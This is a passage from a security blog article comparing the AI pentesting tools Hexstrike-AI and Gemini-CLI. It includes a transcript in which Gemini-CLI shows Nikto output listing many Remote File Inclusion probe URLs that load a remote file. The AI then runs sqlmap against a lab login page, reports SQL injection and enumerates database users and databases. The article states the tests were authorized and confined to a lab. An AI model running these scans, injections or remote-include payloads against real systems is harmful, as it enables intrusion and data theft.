│ + /index.php?phpbb_root_path=http://blog.cirt.net/rfiinc.txt: │
│ Remote File Inclusion (RFI) from RSnake's RFI list. See: │
│ https://gist.github.com/mubix/5d269c686584875015a2 │
│ + /index.php?plugin=http://blog.cirt.net/rfiinc.txt: Remote File │
│ Inclusion (RFI) from RSnake's RFI list. See: │
│ https://gist.github.com/mubix/5d269c686584875015a2 │
│ + /index.php?principal=http://blog.cirt.net/rfiinc.txt: Remote │
│ File Inclusion (RFI) from RSnake's RFI list. See: │
│ https://gist.github.com/mubix/5d269c686584875015a2 │
│ + /index.php?proMod=http://blog.cirt.net/rfiinc.txt: Remote File │
│ Inclusion (RFI) from RSnake's RFI list. See: │
│ https://gist.github.com/mubix/5d269c686584875015a2 │
│ + /index.php?proMod=http://blog.cirt.net/rfiinc.txt?cmd: Remote │
│ File Inclusion (RFI) from RSnake's RFI list. See: │
│ https://gist.github.com/mubix/5d269c686584875015a2 │
│ + /index.php?project=http://blog.cirt.net/rfiinc.txt: Remote File │
│ Inclusion (RFI) from RSnake's RFI list. See: │
│ https://gist.github.com/mubix/5d269c686584875015a2 │
│ + /index.php?repinc=http://blog.cirt.net/rfiinc.txt?: Remote File │
│ Inclusion (RFI) from RSnake's RFI list. See: │
│ https://gist.github.com/mubix/5d269c686584875015a2 │
│ + /index.php?root_prefix=http://blog.cirt.net/rfiinc.txt: Remote │
│ File Inclusion (RFI) from RSnake's RFI list. See: │
│ https://gist.github.com/mubix/5d269c686584875015a2 │
│ + /index.php?root_prefix=http://blog.cirt.net/rfiinc.txt?: Remote │
│ File Inclusion (RFI) from RSnake's RFI list. See: │
│ https://gist.github.com/mubix/5d269c686584875015a2 │
│ + /index.php?section=http://blog.cirt.net/rfiinc.txt: Remote File │
│ Inclusion (RFI) from RSnake's RFI list. See: │
│ https://gist.github.com/mubix/5d269c686584875015a2 │
│ + /index.php?site=http://blog.cirt.net/rfiinc.txt: Remote File │
│ Inclusion (RFI) from RSnake's RFI list. See: │
│ https://gist.github.com/mubix/5d269c686584875015a2 │
│ + /index.php?site_path=http://blog.cirt.net/rfiinc.txt: Remote │
│ File Inclusion (RFI) from RSnake's RFI list. See: │
│ https://gist.github.com/mubix/5d269c686584875015a2 │
│ + /index.php?styl[top]=http://blog.cirt.net/rfiinc.txt??: Remote │
│ File Inclusion (RFI) from RSnake's RFI list. See: │
│ https://gist.github.com/mubix/5d269c686584875015a2 │
│ + /index.php?template=http://blog.cirt.net/rfiinc.txt?: Remote │
│ File Inclusion (RFI) from RSnake's RFI list. See: │
│ https://gist.github.com/mubix/5d269c686584875015a2 │
│ + /index.php?templates_dir=http://blog.cirt.net/rfiinc.txt?: │
│ Remote File Inclusion (RFI) from RSnake's RFI list. See: │
│ https://gist.github.com/mubix/5d269c686584875015a2 │
│ + /index.php?theme=http://blog.cirt.net/rfiinc.txt: Remote File │
│ Inclusion (RFI) from RSnake's RFI list. See: │
│ https://gist.github.com/mubix/5d269c686584875015a2 │
│ + /index.php?themepath=http://blog.cirt.net/rfiinc.txt?: Remote │
│ File Inclusion (RFI) from RSnake's RFI list. See: │
│ https://gist.github.com/mubix/5d269c686584875015a2 │
│ + /index.php?themesdir=http://blog.cirt.net/rfiinc.txt: Remote │
│ File Inclusion (RFI) from RSnake's RFI list. See: │
│ https://gist.github.com/mubix/5d269c686584875015a2 │
│ + /index.php?this_path=http://blog.cirt.net/rfiinc.txt?: Remote │
│ File Inclusion (RFI) from RSnake's RFI list. See: │
│ https://gist.github.com/mubix/5d269c686584875015a2 │
│ + /index.php?txt=http://blog.cirt.net/rfiinc.txt: Remote File │
│ Inclusion (RFI) from RSnake's RFI list. See: │
│ https://gist.github.com/mubix/5d269c686584875015a2 │
│ + /index.php?up=http://blog.cirt.net/rfiinc.txt: Remote File │
│ Inclusion (RFI) from RSnake's RFI list. See: │
│ https://gist.github.com/mubix/5d269c686584875015a2 │
│ + /index.php?url=http://blog.cirt.net/rfiinc.txt: Remote File │
│ Inclusion (RFI) from RSnake's RFI list. See: │
│ https://gist.github.com/mubix/5d269c686584875015a2 │
│ + /index.php?w=http://blog.cirt.net/rfiinc.txt: Remote File │
│ Inclusion (RFI) from RSnake's RFI list. See: │
│ https://gist.github.com/mubix/5d269c686584875015a2 │
│ + /index.php?way=http://blog.cirt.net/rfiinc.txt??????????????: │
│ Remote File Inclusion (RFI) from RSnake's RFI list. See: │
│ https://gist.github.com/mubix/5d269c686584875015a2 │
│ + /login.php: Admin login page/section found. │
│ + /webservices/: Directory indexing found. │
│ + /webservices/: Webservices found. │
│ + 8110 requests: 0 error(s) and 145 item(s) reported on remote │
│ host │
│ + End Time: 2025-10-21 13:35:37 (GMT-4) (197 seconds) │
│ ----------------------------------------------------------------- │
│ + 1 host(s) tested │
│ │
│ ***************************************************************** │
│ Portions of the server's headers (Apache/2.4.65) are not in │
│ the Nikto 2.5.0 database or are newer than the known │
│ string. Would you like │
│ to submit this information (*no server specific data*) to │
│ CIRT.net │
│ for a Nikto update (or you may email to This email address is being protected from spambots. You need JavaScript enabled to view it.) │
│ (y/n)? │
╰──────────────────────────────────────────────────────────────────────────────────╯
✦ The Nikto scan of 192.168.0.152 revealed several potential vulnerabilities. Key
findings include:

* Missing Security Headers: The X-Frame-Options and X-Content-Type-Options
headers are not set, which could lead to clickjacking and MIME-type sniffing
attacks.
* Insecure Cookies: The PHPSESSID and showhints cookies are created without the
httponly flag, making them accessible to client-side scripts and increasing
the risk of session hijacking.
* Information Disclosure: The server returns a x-powered-by header revealing
it's running PHP/8.4.13. The phpinfo.php file is also accessible, which
discloses a significant amount of system information.
* Directory Indexing: Several directories, including /data/, /includes/,
/passwords/, /images/, /styles/, and /webservices/, have directory indexing
enabled, which can expose sensitive files.
* File Traversal/Inclusion: The scan identified a potential file traversal
vulnerability in a PHP-Nuke Rocket add-in and numerous potential Remote File
Inclusion (RFI) vulnerabilities.
* robots.txt: The robots.txt file contains 7 entries that should be manually
reviewed.

The scan also found an admin login page at /login.php. It seems like this web
server has a lot of security issues.

╭──────────────────────────────────────────────────────────────────────────────╮
│ > run sqlmap for the login page to detect sql injection and try to discover │
│ databases and users on the sql server. │
╰──────────────────────────────────────────────────────────────────────────────╯

✦ I will now run sqlmap on the login page to test for SQL injection vulnerabilities. As you requested, I
will instruct sqlmap to attempt to enumerate all databases and users.

╭────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ ✓ Shell sqlmap -u 'http://192.168.0.152/index.php?page=login.php' --data='username=test&password=test…│
│ │
│ ... first 133 lines hidden ... │
│ web application technology: PHP 8.4.13, Apache 2.4.65, PHP │
│ back-end DBMS: MySQL >= 5.0 (MariaDB fork) │
│ [01:45:39] [INFO] fetching database users │
│ [01:45:39] [INFO] retrieved: ''healthcheck'@'localhost'' │
│ [01:45:40] [INFO] retrieved: ''healthcheck'@'::1'' │
│ [01:45:40] [INFO] retrieved: ''healthcheck'@'127.0.0.1'' │
│ [01:45:40] [INFO] retrieved: ''mariadb.sys'@'localhost'' │
│ [01:45:40] [INFO] retrieved: ''root'@'localhost'' │
│ [01:45:40] [INFO] retrieved: ''root'@'localhost'' │
│ [01:45:40] [INFO] retrieved: ''root'@'localhost'' │
│ [01:45:40] [INFO] retrieved: ''root'@'localhost'' │
│ [01:45:40] [INFO] retrieved: ''root'@'localhost'' │
│ [01:45:42] [INFO] retrieved: ''root'@'%'' │
│ [01:45:42] [INFO] retrieved: ''root'@'%'' │
│ [01:45:43] [INFO] retrieved: ''root'@'%'' │
│ [01:45:43] [INFO] retrieved: ''root'@'%'' │
│ [01:45:43] [INFO] retrieved: ''root'@'%'' │
│ database management system users [6]: │
│ [*] 'healthcheck'@'127.0.0.1' │
│ [*] 'healthcheck'@'::1' │
│ [*] 'healthcheck'@'localhost' │
│ [*] 'mariadb.sys'@'localhost' │
│ [*] 'root'@'%' │
│ [*] 'root'@'localhost' │
│ │
│ [01:45:45] [INFO] fetching database names │
│ [01:45:45] [INFO] retrieved: 'information_schema' │
│ [01:45:45] [INFO] retrieved: 'sys' │
│ [01:45:45] [INFO] retrieved: 'mysql' │
│ [01:45:45] [INFO] retrieved: 'performance_schema' │
│ [01:45:45] [INFO] retrieved: 'mutillidae' │
│ available databases [5]: │
│ [*] information_schema │
│ [*] mutillidae │
│ [*] mysql │
│ [*] performance_schema │
│ [*] sys │
│ │
│ [01:45:46] [INFO] you can find results of scanning in multiple targets mode inside the CSV │
│ file '/root/.local/share/sqlmap/output/results-10212025_0144am.csv' │
│ │
│ [*] ending @ 01:45:46 /2025-10-21/ │
╰────────────────────────────────────────────────────────────────────────────────────────────────────────╯
✦ The sqlmap scan was successful and confirmed that the username parameter on the login page is vulnerable
to SQL injection.

Here are the databases and users that were extracted:

Databases:

* information_schema
* mutillidae
* mysql
* performance_schema
* sys

Users:

* 'healthcheck'@'127.0.0.1'
* 'healthcheck'@'::1'
* 'healthcheck'@'localhost'
* 'mariadb.sys'@'localhost'
* 'root'@'%'
* 'root'@'localhost'

The mutillidae database seems to be the most relevant to the application. Would you like me to try to
extract the tables and their contents from this database?

Note: The test was performed in a private, isolated lab environment as a proof-of-concept to evaluate Gemini-CLI effectiveness in penetration-testing workflows. All tests were authorized, reproducible, contained, and confined to isolated systems; no production or third-party systems were involved.

Comparison: Hexstrike-AI vs. Gemini-CLI

Feature	Hexstrike-AI	Gemini-CLI Native
AI Model Support	Supports any LLM (e.g., Claude, GPT, Copilot, Deepseek) via MCP integration; highly flexible for custom setups.	Limited to Google's Gemini models (e.g., Gemini 2.5 Pro); no support for external LLMs.
Tool Integration	Autonomous execution of 150+ Kali tools (e.g., Nmap, sqlmap, Metasploit, hashcat) across categories like reconnaissance, web exploits, and reverse engineering.	Integrates with Kali's core tools (e.g., Nmap, sqlmap, wfuzz) for chained automation; focuses on OWASP Top 10 and common workflows.
Automation Level	High autonomy with multi-agent architecture; AI agents make decisions, discover attack chains, and run full pentests independently.	Semi-autonomous; natural language prompts trigger steps, but requires human review/confirmation (interactive mode) or "YOLO" mode for full auto.
Use Cases	Advanced pentesting, bug bounty automation, zero-day exploitation, security research; excels in complex, multi-stage scenarios.	Reconnaissance, enumeration, vulnerability scanning, remediation suggestions; best for quick, guided assessments.
Installation	Git clone from GitHub, Python venv setup, pip dependencies; requires manual tool installs (script available); ~50GB+ storage for full setup.	Native via sudo apt install gemini-cli; lightweight (12MB installed size); no extra dependencies beyond Kali 2025.3.
System Requirements	Kali 2024.1+, Python 3.9+, 8GB+ RAM, 50GB+ storage, GPU optional for acceleration.	Kali 2025.3+, minimal resources; runs efficiently on standard hardware.
Human Oversight	Optional; designed for full autonomy but supports intervention via API/logs.	Emphasizes control; prompts for confirmation on actions to prevent misuse.
Ethical/Safety Features	Logging and caching for audit; creator emphasizes defender use, but adaptable for red teaming.	Built-in consent prompts, operation logging, offline mode; safeguards against over-reliance or abuse.
Community & Updates	Active GitHub repo (0x4m4/hexstrike-ai); v6.0 includes vulnerability intelligence; community-driven tool additions.	Official Kali package; tied to Google's Gemini updates; integrated into Kali's rolling release cycle.

Looking at the Future to Advance Offensive Security Using AI

Hexstrike-AI represents a highly automated, tool-chain-oriented, end-to-end AI framework capable of performing reconnaissance, scanning, exploitation, and persistence with minimal manual intervention. This level of automation introduces significant efficiency gains but also comes with added complexity and potential risk.

Gemini-CLI, on the other hand, serves as an LLM-powered assistant integrated into the penetration testing workflow. It provides a conversational interface for crafting reconnaissance queries, generating command snippets, and assisting in payload development—while maintaining the operator’s control over execution.

Together, these tools demonstrate how artificial intelligence is transforming offensive security from traditional “manual toolsets and scripts” into “AI-assisted reasoning and automation.” However, they also emphasize an essential principle: technology cannot replace human judgment, authorization, or ethical responsibility. When applied responsibly, AI tools act as powerful force multipliers; when misused, they can amplify risk and unintended consequences.

Conclusion

What this comparison shows is that AI-powered offensive tools are no longer just hype — they’re becoming practical. Hexstrike-AI shines when you need a more autonomous exploit-and-escalate chain. Gemini-CLI stands out when you want flexibility, data-driven reconnaissance and payload refinement.

For anyone in offensive security on Kali Linux: these tools represent the next wave — faster, smarter, more adaptive. That said, they don’t replace human expertise, judgment or ethics. Used well, they’re force multipliers. Used poorly, they can raise serious risk.

In short: Hexstrike-AI and Gemini-CLI signal that offensive security is evolving — and practitioners who stay ahead of the curve will be better equipped..

Disclaimer: This documentation is intended for educational purposes only. The content provided herein is meant to inform and educate individuals about security practices, techniques, and tools. Security-Science does not support, endorse, or encourage any illegal or unethical activities, including but not limited to unauthorized access to computer systems, networks, or data. Users are advised to apply the knowledge gained responsibly and ensure compliance with all applicable laws and regulations. Security-Science shall not be held liable for any misuse of the information provided.

Hexstrike-AI vs Gemini-CLI: AI-Powered Offensive Security Tools on Kali Linux

Application Security

Ethical Hacking